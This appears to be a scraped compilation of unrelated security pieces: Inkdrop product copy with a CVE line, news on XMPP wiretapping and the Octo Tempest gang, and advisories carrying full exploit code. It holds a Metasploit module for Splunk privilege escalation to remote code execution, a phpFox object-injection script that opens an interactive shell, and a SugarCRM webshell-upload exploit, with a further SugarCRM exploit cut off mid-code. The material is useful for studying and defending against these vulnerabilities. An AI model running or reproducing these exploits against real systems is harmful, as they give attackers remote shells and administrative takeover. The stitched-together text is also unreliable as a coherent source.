Inkdrop prior to v5.6.0 allows a local attacker to conduct a code injection attack by having a legitimate user open a specially crafted markdown file.

**Solely designed for Markdown to improve your dev workflow**

Get a low-friction personal note-taking workflow and accomplish more. With your notes well-organized effortlessly, you can stay focused on doing your best work.

**A versatile Markdown editor**

It comes with multi-language code highlighting, multi-cursors, line numbers, scrolling beyond the last line, showing invisible characters and more.

**Focus on the work that matters**

An intuitive and clean user interface and 'Distraction free mode' don't distract you from the text.

**Get things done**

Track your work progress with note status and task progress view in the note list.

**Never lose your ideas**

Whenever, even while in offline, you can read and write notes. Just open up the app, then it will be instantly ready for you to start jotting down before you forget the idea.

With its high customizability, extensibility and 100+ plugins, it will stick with your workflow and improve your productivity.

Browse plugins 

**Make it your notebook**

Pick your favorite look and feel from the themes. You can also tweak your UI with CSS/Less to make it more comfortable for your jottings.

Browse themes 

How to tweak styles 

**Have it everywhere, securely**

Capture a note once, and it’s instantly available on all your devices. It syncs data securely with end-to-end encryption.

Learn more 

**Never lose your work**

Accidentally deleted lines? You can restore them from the revision history. A seamless backup keeps your notes safely stored in your local filesystem.

**Optional self-hosted database**

If you don't trust anyone with your data, you can set up your own CouchDB server to store your data instead of the Inkdrop server.

Learn more 

**Trusted by developers around the worldSee more**

**Get started today****Available on 5 platforms for just $4.16 per month (annual billing). No credit card information required for 30-day free trial.**

**Who is making Inkdrop?**

It is developed by an indie developer, Takuya Matsuyama, based in Japan.

CVE-2023-44141: Inkdrop - Note-taking App with Robust Markdown Editor

New findings have shed light on what's said to be a lawful attempt to covertly intercept traffic originating from jabber[.]ru (aka xmpp[.]ru), an XMPP-based instant messaging service, via servers hosted on Hetzner and Linode (a subsidiary of Akamai) in Germany.
"The attacker has issued several new TLS certificates using Let's Encrypt service which were used to hijack encrypted STARTTLS

New findings have shed light on what's said to be a lawful attempt to covertly intercept traffic originating from jabber\[.\]ru (aka xmpp\[.\]ru), an XMPP\-based instant messaging service, via servers hosted on Hetzner and Linode (a subsidiary of Akamai) in Germany.

"The attacker has issued several new TLS certificates using Let's Encrypt service which were used to hijack encrypted STARTTLS connections on port 5222 using transparent \[man-in-the-middle\] proxy," a security researcher who goes by the alias ValdikSS said earlier this week.

"The attack was discovered due to the expiration of one of the MiTM certificates, which haven't been reissued."

Evidence gathered so far points to the traffic redirection being configured on the hosting provider network, ruling out other possibilities, such as a server breach or a spoofing attack.

The wiretapping is estimated to have lasted for as long as six months, from April 18 through to October 19, although it's been confirmed to have taken place since at least July 21, 2023, and until October 19, 2023.

Signs of suspicious activity were first detected on October 16, 2023, when one of the UNIX administrators of the service received a "Certificate has expired" message upon connecting to it.

The threat actor is believed to have stopped the activity after the investigation into the MiTM incident began on October 18, 2023. It's not immediately clear who is behind the attack, but it's suspected to be a case of lawful interception based on a German police request.

Another hypothesis, however unlikely but not impossible, is that the MiTM attack is an intrusion on the internal networks of both Hetzner and Linode, specifically singling out jabber\[.\]ru.

"Given the nature of the interception, the attackers have been able to execute any action as if it is executed from the authorized account, without knowing the account password," the researcher said.

"This means that the attacker could download the account's roster, lifetime unencrypted server-side message history, send new messages or alter them in real time."

The Hacker News has reached out to Akamai and Hetzner for further comment, and we will update the story if we hear back.

Users of the service are recommended to assume that their communications over the past 90 days are compromised, as well as "check their accounts for new unauthorized OMEMO and PGP keys in their PEP storage, and change passwords."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Wiretapping of XMPP-Based Instant Messaging Service

The financially motivated English-speaking threat actors use advanced social engineering techniques, SIM swapping, and even threats of violence to breach targets.

The financially motivated hacking group Octo Tempest, responsible for attacking MGM Resorts International and Caesars Entertainment in September, has been branded "one of the most dangerous financial criminal groups" by Microsoft's Incident Response and Threat Intelligence team.

The group, also known as 0ktapus, Scattered Spider, and UNC3944, has been active since early 2022, initially targeting telecom and outsourcing companies with SIM swap attacks.

It later shifted to extortion using stolen data, and by mid-2023 the group had partnered with ALPHV/BlackCat ransomware, initially leveraging the ALPHV Collections leak site and later deploying the ransomware, focusing on VMWare ESXi servers.

Microsoft's in-depth post about the group and its extensive range of tactics, techniques, and procedures (TTPs) details the evolution of Octo Tempest and the fluidity of its operations.

"In recent campaigns, we observed Octo Tempest leverage a diverse array of TTPs to navigate complex hybrid environments, exfiltrate sensitive data, and encrypt data," the report notes. "Octo Tempest leverages tradecraft that many organizations don't have in their typical threat models, such as SMS phishing, SIM swapping, and advanced social engineering techniques."

**The Multi-Armed 0ktapus Cybercrime Playbook**

The group gains initial access through advanced social advanced social engineering techniques, often targeting employees with access to network permissions, including support and help desk personnel.

The attackers call these individuals, and attempt to persuade them to reset user passwords, change or add authentication tokens, or install a remote monitoring and management (RMM) utility.

The group is not beyond leveraging personal information, such as home addresses and family names, or even making physical threats, to coerce victims into sharing corporate access credentials.

During the initial stages of the attacks, Octo Tempest conducts extensive reconnaissance, which includes gathering data on users, groups, and device information, and exploring network architecture, employee onboarding, and password policies.

The group uses tools including PingCastle and ADRecon for Active Directory reconnaissance, and the PureStorage FlashArray PowerShell SDK for enumerating storage arrays.

They reach deep into multi-cloud environments, code repositories, and server infrastructure, aiming to validate access and plan footholds for subsequent attack phases, a process that helps the group enhance their activities within targeted environments.

**Partnering With Russians: Unprecedented Fusion of Tactics, Tools**

Callie Guenther, senior manager of cyber threat research at Critical Start, says English-speaking Octo Tempest's affiliation with the Russian-speaking BlackCat group signifies an "unprecedented fusion" of resources, technical tools, and refined ransomware tactics.

"Historically, the distinct boundaries maintained between Eastern European and English-speaking cybercriminals provided some semblance of regional demarcation," she explains. "Now, this alliance allows Octo Tempest to operate on a wider canvas, both geographically and in terms of potential targets."

She notes that the convergence of Eastern European cyber expertise with the linguistic and cultural nuances of English-speaking affiliates enhances the localization and efficacy of their attacks.

From her perspective, the multifaceted approach Octo Tempest employs is particularly alarming.

"Beyond their technical prowess, they've mastered the art of social engineering, adapting their tactics to impersonate and blend seamlessly into targeted organizations," she says. "This, combined with their alignment with the formidable BlackCat ransomware group, amplifies their threat manifold."

She notes the real concern emerges when one realizes they've diversified from specific industries to a broader spectrum and are now unafraid to resort to outright physical threats, showcasing a concerning escalation in cybercriminal tactics.

Tony Goulding, cybersecurity evangelist at Delinea, agrees the blend of sophisticated techniques, broad scope of industries targeted, and their aggressive approach — even resorting to physical threats — are the most dangerous aspects of the group.

"Organizations should be very concerned," he explains. "Being native English speakers, they can more effectively launch wide-ranging social engineering campaigns compared to BlackCat."

He says this is particularly beneficial when using idiolect methods to convincingly impersonate employees during phone calls.

"Proficiency in English also helps them craft more convincing phishing messages for their signature SMS phishing and SIM swapping techniques," he adds.

**Defense In-Depth**

Guenther says defending against Octo Tempest's financial pursuits involves a series of proactive and reactive measures, adhering to the principle of least privilege to ensure restricted access.

"Cryptocurrencies should be stored in offline cold wallets to minimize online exposure," she advises. "Continual system updates and anti-ransomware solutions can thwart most ransomware deployments."

Advanced network monitoring can detect anomalous data flows, indicative of potential data exfiltration attempts.

"In case of breaches or attacks, an established incident response strategy can guide immediate actions," she adds. "Collaborative threat intelligence sharing with industry peers can also keep organizations abreast of emerging threats and countermeasures."

Goulding points out education, awareness training, and technical controls that vault privileged accounts and protect access workstations and servers are key.

"Putting obstacles in the path of threat actors all along the attack chain, to divert them from their playbook and generate noise, is super important for early detection," he says. "The more advanced and proficient the attack group, the better prepared they will be, so investing in the best tools that include modern capabilities is your best bet."

Octo Tempest Group Threatens Physical Violence as Social Engineering Tactic

Splunk suffers from an issue where a low-privileged user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing a specially crafted web request. This is because the edit_user capability does not honor the grantableRoles setting in the authorize.conf configuration file, which prevents this scenario from happening. This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  attr_accessor :cookie  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Splunk "edit_user" Capability Privilege Escalation',        'Description' => %q{          A low-privileged user who holds a role that has the "edit_user" capability assigned to it          can escalate their privileges to that of the admin user by providing a specially crafted web request.          This is because the "edit_user" capability does not honor the "grantableRoles" setting in the authorize.conf          configuration file, which prevents this scenario from happening.          This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.        },        'Author' => [          'Mr Hack (try_to_hack) Santiago Lopez', # discovery          'Heyder Andrade', # metasploit module          'Redway Security <redwaysecurity.com>' # Writeup and PoC        ],        'License' => MSF_LICENSE,        'References' => [          [ 'CVE', '2023-32707' ],          [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-0602' ], # Vendor Advisory          [ 'URL', 'https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html' ], # Writeup          [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707' ] # PoC        ],        'Payload' => {          'Space' => 1024,          'DisableNops' => true        },        'Platform' => %w[linux unix win osx],        'Targets' => [          [            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux',            {              'Arch' => ARCH_CMD,              'Platform' => %w[linux unix],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_python',                # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'                'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'              }            }          ],          [            'Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows',            {              'Arch' => ARCH_CMD,              'Platform' => 'win',              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8000,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS, # requests are logged in the _audit index            # ARTIFACTS_ON_DISK # app is removed in the cleanup method          ]        },        'DisclosureDate' => '2023-06-01'      )    )    register_options(      [        OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),        OptString.new('PASSWORD', [true, 'The password for the specified username']),        OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),        OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/(\s|-|_){1,}/, '')])      ]    )    # That depends on finding a strategy to distinguish commands that return output and commands that don't    # register_advanced_options(    #   [    #     OptBool.new('ReturnOutput', [ true, 'Display command output', false ])    #   ]    # )  end  def check    splunk_login(datastore['USERNAME'], datastore['PASSWORD'])    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),      'method' => 'GET',      'cookie' => cookie,      'vars_get' => {        'output_mode' => 'json'      }    })    return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200    body = res.get_json_document    version = Rex::Version.new(body['generator']['version'])    return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (      (Rex::Version.new('9.0.0') <= version && version < Rex::Version.new('9.0.5')) ||      (Rex::Version.new('8.2.0') <= version && version < Rex::Version.new('8.2.11')) ||      (Rex::Version.new('8.1.0') <= version && version < Rex::Version.new('8.1.14'))    )    print_status("Detected Splunk version #{version} which is vulnerable")    capabilities = body['entry'].first['content']['capabilities']    return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 'edit_user'    report_vuln(      host: rhost,      name: name,      refs: references,      info: [version]    )    CheckCode::Vulnerable("User '#{datastore['USERNAME']}' has 'edit_user' capability")  end  def app_name    datastore['APP_NAME']  end  # The cleanup method is removing the app before the session is closed and it is broking the session.  #  def cleanup    return unless session_created?    super    # Destroy job    vprint_status("Cleaning up: destroying job #{@job_id}")    send_request_cgi({      'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),      'method' => 'DELETE',      'cookie' => cookie    })    # Remove app    vprint_status("Cleaning up: removing app #{app_name}")    execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")    send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),      'method' => 'POST',      'cookie' => cookie,      'vars_post' => {        'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']      }    })  end  def exploit    splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])    splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])    splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE'])    @job_id = execute_command(payload.encoded, { app_name: app_name })    # TODO: distinguish commands that return output and commands that don't    # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 'return output' && !datastore['ReturnOutput']    # if datastore['ReturnOutput']    #   print_status('Waiting for command output')    #   print_line(splunk_fetch_job_output)    # end  end  def execute_command(cmd, opts = {})    res = send_request_cgi({      'uri' => '/en-US/api/search/jobs',      'method' => 'POST',      'cookie' => cookie,      'headers' =>        {          'X-Requested-With' => 'XMLHttpRequest',          'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000']        },      'vars_post' =>        {          'auto_cancel' => '62',          'status_buckets' => '300',          'output_mode' => 'json',          'search' => "|  #{app_name} #{Rex::Text.encode_base64(cmd)}",          'earliest_time' => '-1@h',          'latest_time' => 'now',          'ui_dispatch_app' => (opts[:app_name]).to_s        }    })    fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless res&.code == 200    body = res.get_json_document    fail_with(Failure::UnexpectedReply, 'Unable to get JOB ID of the command') unless body['data']    body['data']  end  def splunk_helper_extract_token(uri)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, uri),      'method' => 'GET',      'keep_cookies' => true    })    fail_with(Failure::Unreachable, 'Unable to get token') unless res&.code == 200    "session_id_8000=#{rand_text_numeric(40)}; " << res.get_cookies  end  def splunk_login(username, password)    # gets cval and splunkweb_uid cookies    self.cookie = splunk_helper_extract_token('/en-US/account/login')    # login post, should get back the splunkd_8000 and splunkweb_csrf_token_8000 cookies    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/account/login'),      'method' => 'POST',      'cookie' => cookie,      'vars_post' =>        {          'username' => username,          'password' => password,          'cval' => cookies_hash['cval']        }    })    fail_with(Failure::UnexpectedReply, 'Unable to login') unless res&.code == 200    cookie << " #{res.get_cookies}"  end  def splunk_change_password(username, password)    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set    do_login(username, password) unless cookie    print_status("Changing '#{username}' password to #{password}")    res = send_request_cgi({      'uri' => normalize_uri('/en-US/splunkd/__raw/services/authentication/users/', username),      'method' => 'POST',      'headers' => {        'X-Splunk-Form-Key' => cookies_hash['splunkweb_csrf_token_8000'],        'X-Requested-With' => 'XMLHttpRequest'      },      'cookie' => cookie,      'vars_post' => {        'output_mode' => 'json',        'password' => password,        'force-change-pass' => 0,        'locked-out' => 0      }    })    fail_with(Failure::UnexpectedReply, "Unable to change #{username}'s password.") unless res&.code == 200    print_good("Password of the user '#{username}' has been changed to #{password}")    body = res.get_json_document    capabilities = body['entry'].first['content']['capabilities']    fail_with(Failure::BadConfig, "The user '#{username}' does not have 'install_app' capability. You may consider to target other user") unless capabilities.include? 'install_apps'  end  def splunk_upload_app(app_name, _file_name)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/en-US/manager/appinstall/_upload'),      'method' => 'GET',      'cookie' => cookie    })    fail_with(Failure::UnexpectedReply, 'Unable to get form state') unless res&.code == 200    html = res.get_html_document    print_status("Uploading file #{app_name}")    data = Rex::MIME::Message.new    # fill the hidden fields from the form: state and splunk_form_key    html.at('[id="installform"]').elements.each do |form|      next unless form.attributes['value']      data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"")    end    data.add_part('1', nil, nil, 'form-data; name="force"')    data.add_part(splunk_app, 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"")    post_data = data.to_s    res = send_request_cgi({      'uri' => '/en-US/manager/appinstall/_upload',      'method' => 'POST',      'cookie' => cookie,      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => post_data    })    fail_with(Failure::Unknown, 'Error uploading App') unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))    print_good("#{app_name} successfully uploaded")  end  # def splunk_fetch_job_output  #   res = send_request_cgi({  #     'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"),  #     'method' => 'GET',  #     'keep_cookies' => true,  #     'cookie' => cookie,  #     'vars_get' => {  #       'output_mode' => 'json'  #     }  #   })  #   fail_with(Failure::UnexpectedReply, "Unable to get JOB results. Unexpected reply (HTTP #{res.code})") unless res&.code == 200  #   body = res.get_json_document  #   fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty?  #   Rex::Text.decode_base64(body['results'].first['result'])  # end  def splunk_app    # metadata folder    metadata = <<~EOF      [commands]      export = system    EOF    # default folder    commands_conf = <<~EOF      [#{app_name}]      type = python      filename = #{app_name}.py      local = false      enableheader = false      streaming = false      perf_warn_limit = 0    EOF    app_conf = <<~EOF      [launcher]      author=#{Faker::Name.name}      description=#{Faker::Lorem.sentence}      version=#{Faker::App.version}      [ui]      is_visible = false    EOF    # bin folder    msf_exec_py = <<~EOF      import sys, base64, subprocess      import splunk.Intersplunk      header = ['result']      results = []      try:        proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)        output = proc.stdout.read().decode('utf-8')        results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})      except Exception as e:        error_msg = f'Error : {str(e)} '        results = splunk.Intersplunk.generateErrorResults(error_msg)      splunk.Intersplunk.outputResults(results, fields=header)    EOF    tarfile = StringIO.new    Rex::Tar::Writer.new tarfile do |tar|      tar.add_file("#{app_name}/metadata/default.meta", 0o644) do |io|        io.write metadata      end      tar.add_file("#{app_name}/default/commands.conf", 0o644) do |io|        io.write commands_conf      end      tar.add_file("#{app_name}/default/app.conf", 0o644) do |io|        io.write app_conf      end      tar.add_file("#{app_name}/bin/#{app_name}.py", 0o644) do |io|        io.write msf_exec_py      end    end    tarfile.rewind    tarfile.close    Rex::Text.gzip(tarfile.string)  end  def cookies_hash    cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }  endend

Splunk edit_user Capability Privilege Escalation

phpFox versions 4.8.13 and below have an issue where user input passed through the "url" request parameter to the /core/redirect route is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code.

--------------------------------------------------------------  
phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability  
--------------------------------------------------------------

[-] Software Link:

https://www.phpfox.com

[-] Affected Versions:

Version 4.8.13 and prior versions.

[-] Vulnerability Description:

User input passed through the "url" request parameter to the   
/core/redirect route is not properly sanitized before being used in a   
call to the unserialize() PHP function. This can be exploited by remote,   
unauthenticated attackers to inject arbitrary PHP objects into the   
application scope, allowing them to perform a variety of attacks, such   
as executing arbitrary PHP code.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-46817.php

(Packet Storm note: POC included at bottom)

[-] Solution:

Upgrade to version 4.8.14 or later.

[-] Disclosure Timeline:

[05/10/2023] - Vendor contacted through https://clients.phpfox.com  
[05/10/2023] - Vendor response stating "we currently do not have such   
security requirements"  
[06/10/2023] - CVE identifier requested  
[09/10/2023] - Vulnerability details shared with the vendor, stating the   
issue is quite critical  
[17/10/2023] - Vendor contacted again, asking for an update  
[18/10/2023] - Vendor response stating "this issue is fixed in our   
latest version (4.8.13)", but that's not the truth  
[26/10/2023] - Version 4.8.14 released  
[27/10/2023] - CVE identifier assigned  
[27/10/2023] - Public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-46817 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-12

[-] Other References:

https://docs.phpfox.com/display/FOX4MAN/phpFox+4.8.14

---  CVE-2023-46817.php poc ---

<?php

/*  
    --------------------------------------------------------------  
    phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability  
    --------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://www.phpfox.com

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    User input passed through the "url" request parameter to the /core/redirect route is  
    not properly sanitized before being used in a call to the unserialize() PHP function.  
    This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP  
    objects into the application scope, allowing them to perform a variety of attacks,  
    such as executing arbitrary PHP code.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2023-12  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[+] cURL extension required!\n");

print "+------------------------------------------------------------------+\n";  
print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";  
print "+------------------------------------------------------------------+\n";

if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

function encode($string)  
{  
        $string = addslashes(gzcompress($string, 9));  
        return urlencode(strtr(base64_encode($string), '+/=', '-_,'));  
}

class Phpfox_Request  
{  
  private $_sName = "EgiX";  
  private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;";  
}

class Core_Objectify  
{  
  private $__toString;

  function __construct($callback)  
  {  
    $this->__toString = $callback;  
  }  
}

print "\n[+] Launching shell on {$argv[1]}\n";

$popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));  
$popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));

while(1)  
{  
    print "\nphpFox-shell# ";  
    if (($cmd = trim(fgets(STDIN))) == "exit") break;  
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);  
    preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");  
}

phpFox 4.8.13 PHP Object Injection

SugarCRM versions 13.0.1 and below suffer from a remote shell upload vulnerability in the set_note_attachment SOAP call.

    -------------------------------------------------------------------------------SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload Vulnerability-------------------------------------------------------------------------------[-] Software Link:https://www.sugarcrm.com[-] Affected Versions:Version 13.0.1 and prior versions.Version 12.0.3 and prior versions.[-] Vulnerability Description:When handling the "set_note_attachment" SOAP call, the application allows uploading ofany kind of file into /upload/ directory. This one is protected by the main SugarCRM.htaccess file, i.e. it doesn't allow access/execution of PHP files. However, thisbehavior can be overridden if the subdirectory contains another .htaccess file.So, an attacker can leverage the vulnerability to firstly upload a new .htaccessfile and then to upload the PHP code they want to execute.[-] Proof of Concept:https://karmainsecurity.com/pocs/KIS-2023-11.php(Packet Storm note: POC included at bottom)[-] Solution:Upgrade to version 13.0.2, 12.0.4, or later.[-] Disclosure Timeline:[23/04/2023] - Vendor notified[21/09/2023] - Fixed versions released[06/10/2023] - CVE identifier requested[26/10/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has not assigned a CVE identifier for this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:https://karmainsecurity.com/KIS-2023-11[-] Other References:https://support.sugarcrm.com/resources/security/sugarcrm-sa-2023-011/--- KIS-2023-11.php poc ---<?phpset_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[+] cURL extension required!\n");if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];print "[+] Logging in with username '{$user}' and password '{$pass}'\n";$ch = curl_init();$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");print "[+] Creating new Notes bean (ID: .htaccess)\n";$note_id = ".htaccess";curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes");curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");print "[+] Creating new Notes bean (ID: sh.php)\n";$note_id = "sh.php";curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");require_once("./lib/nusoap.php");$client = new nusoap_client("{$url}soap.php", false);if (($err = $client->getError())){  echo "\nConstructor error: $err";  echo "\nDebug: " . $client->getDebug() . "\n";  die();}print "[+] Sending SOAP login request\n";$params = ["user_auth" => ["user_name" => $user, "password" => $pass]];$session = $client->call('login', $params);if ($session['id'] == -1) die("[+] SOAP login failed!\n");print "[+] Uploading .htaccess through 'set_note_attachment'\n";$htaccess = "RewriteEngine on\nRewriteBase /upload\nRewriteRule ^(.*)$ - [L]\nphp_flag zend.multibyte 1\nphp_value zend.script_encoding \"UTF-7\"";$params = ["session" => $session['id'], "note" => ["id" => ".htaccess", "file" => base64_encode($htaccess)]];$client->call("set_note_attachment", $params);print "[+] Uploading shell through 'set_note_attachment'\n";$shell = "+ADw?php passthru(\$_SERVER['HTTP_CMD']); ?>";$params = ["session" => $session['id'], "note" => ["id" => "sh.php", "file" => base64_encode($shell)]];$client->call("set_note_attachment", $params);print "[+] Launching shell\n";curl_setopt($ch, CURLOPT_URL, "{$url}upload/sh.php");while(1){    print "\nsugar-shell# ";    if (($cmd = trim(fgets(STDIN))) == "exit") break;    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd]);    ($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n");}

SugarCRM 13.0.1 Shell Upload

SugarCRM versions 13.0.1 and below suffer from a server-side template injection vulnerability in the GetControl action from the Import module. This issue can be leveraged to execute arbitrary php code.

    ----------------------------------------------------------------------------SugarCRM <= 13.0.1 (GetControl) Server-Side Template Injection Vulnerability----------------------------------------------------------------------------[-] Software Link:https://www.sugarcrm.com[-] Affected Versions:Version 13.0.1 and prior versions.Version 12.0.3 and prior versions.[-] Vulnerability Description:There is a sort of Server-Side Template Injection (SSTI) vulnerability affectingthe "GetControl" action from the "Import" module. User input passed through the"field_name" parameter is not properly sanitized before being used to constructthe path of the template to include. As such, this can be abused to include andexecute arbitrary PHP code through Path Traversal attacks.[-] Proof of Concept:https://karmainsecurity.com/pocs/KIS-2023-10.php(Packet Storm note: POC included at bottom)[-] Solution:Upgrade to version 13.0.2, 12.0.4, or later.[-] Disclosure Timeline:[23/04/2023] - Vendor notified[21/09/2023] - Fixed versions released[06/10/2023] - CVE identifier requested[26/10/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has not assigned a CVE identifier for this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:https://karmainsecurity.com/KIS-2023-10[-] Other References:https://support.sugarcrm.com/resources/security/sugarcrm-sa-2023-010/--- KIS-2023-10.php poc  ---<?phpset_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[+] cURL extension required!\n");if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];print "[+] Logging in with username '{$user}' and password '{$pass}'\n";$ch = curl_init();$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");print "[+] Creating new Notes bean\n";$note_id = time().".tpl";curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes");curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);curl_setopt($ch, CURLOPT_POSTFIELDS, 